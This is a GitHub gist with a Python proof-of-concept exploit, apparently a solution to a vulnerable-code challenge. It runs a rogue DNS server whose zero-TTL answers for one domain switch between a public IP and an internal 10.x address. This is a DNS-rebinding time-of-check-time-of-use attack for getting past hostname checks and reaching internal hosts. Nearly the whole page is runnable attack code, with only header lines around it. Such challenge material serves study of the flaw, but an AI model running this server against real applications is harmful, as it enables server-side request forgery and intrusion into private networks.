Skip to content

Instantly share code, notes, and snippets.

@2S1one
Created May 12, 2024 10:12
Show Gist options
  • Save 2S1one/309d46d7bfc4b25f7c224a51679a3cb9 to your computer and use it in GitHub Desktop.
Save 2S1one/309d46d7bfc4b25f7c224a51679a3cb9 to your computer and use it in GitHub Desktop.
# TOU TOC - POC
# Roy H.
# Solution for https://github.com/2S1one/vulnerable-code-snippets
# Updated for more reliability
import binascii
import copy
import socket
import struct
import sys
import time
from dnslib import DNSRecord, RR, QTYPE, RCODE
from dnslib.server import DNSServer, BaseResolver, DNSLogger
from dnslib.label import DNSLabel
DOMAIN = "abirabirtest.com."
class CustomDNSLogger(DNSLogger):
def __init__(self, log_prefix, log_suffix):
super().__init__(log_prefix, log_suffix)
self.reply_counter = 0
def log_recv(self, handler, data):
try:
request = DNSRecord.parse(data)
if str(request.q.qname) == DOMAIN:
super().log_recv(handler, data)
except Exception as e:
pass # Ignore parse errors and do not log them
def log_send(self, handler, data):
try:
response = DNSRecord.parse(data)
if str(response.q.qname) == DOMAIN:
super().log_send(handler, data)
except Exception as e:
pass # Ignore parse errors and do not log them
def log_request(self, handler, request):
if str(request.q.qname) == DOMAIN:
super().log_request(handler, request)
def log_reply(self, handler, reply):
if str(reply.q.qname) == DOMAIN:
self.reply_counter += 1
super().log_reply(handler, reply)
print(self.reply_counter)
def log_truncated(self, handler, reply):
if str(reply.q.qname) == DOMAIN:
super().log_truncated(handler, reply)
def log_error(self, handler, e):
super().log_error(handler, e)
class InterceptResolver(BaseResolver):
def __init__(self, intercept_1, intercept_2, fallback_dns='8.8.8.8', port=53):
self.switcher = 0
self.ttl = 0
self.zone_1 = []
self.zone_2 = []
self.fallback_dns = fallback_dns
self.fallback_port = port
for i in intercept_1:
for rr in RR.fromZone(i, ttl=self.ttl):
self.zone_1.append((rr.rname, QTYPE[rr.rtype], rr))
for i in intercept_2:
for rr in RR.fromZone(i, ttl=self.ttl):
self.zone_2.append((rr.rname, QTYPE[rr.rtype], rr))
print('TOU TOUC - Created Switching Zone')
print('zone_1', self.zone_1)
print('zone_2', self.zone_2)
def resolve(self, request, handler):
reply = request.reply()
qname = request.q.qname
if str(qname) == DOMAIN:
if self.switcher < 2:
zone = self.zone_1
else:
zone = self.zone_2
# Increment switcher and reset if it reaches 4
self.switcher = (self.switcher + 1) % 4
for name, rtype, rr in zone:
a = copy.copy(rr)
a.rname = qname
reply.add_answer(a)
else:
try:
if handler.protocol == 'udp':
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.connect((self.fallback_dns, self.fallback_port))
sock.send(bytearray(request.pack()))
data = sock.recv(1024)
reply = DNSRecord.parse(data)
except Exception as e:
print(f"Failed to forward DNS request: {e}")
finally:
sock.close()
return reply
if __name__ == '__main__':
my_address = '0.0.0.0'
my_port = 53
my_resolver_1 = [f'{DOMAIN} 300 IN A 1.0.0.1']
my_resolver_2 = [f'{DOMAIN} 300 IN A 10.28.85.66']
resolver = InterceptResolver(my_resolver_1, my_resolver_2)
logger = CustomDNSLogger('request,reply,truncated,error', False)
udp_server = DNSServer(resolver, port=my_port, address=my_address, logger=logger)
udp_server.start_thread()
while udp_server.isAlive():
time.sleep(0.1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment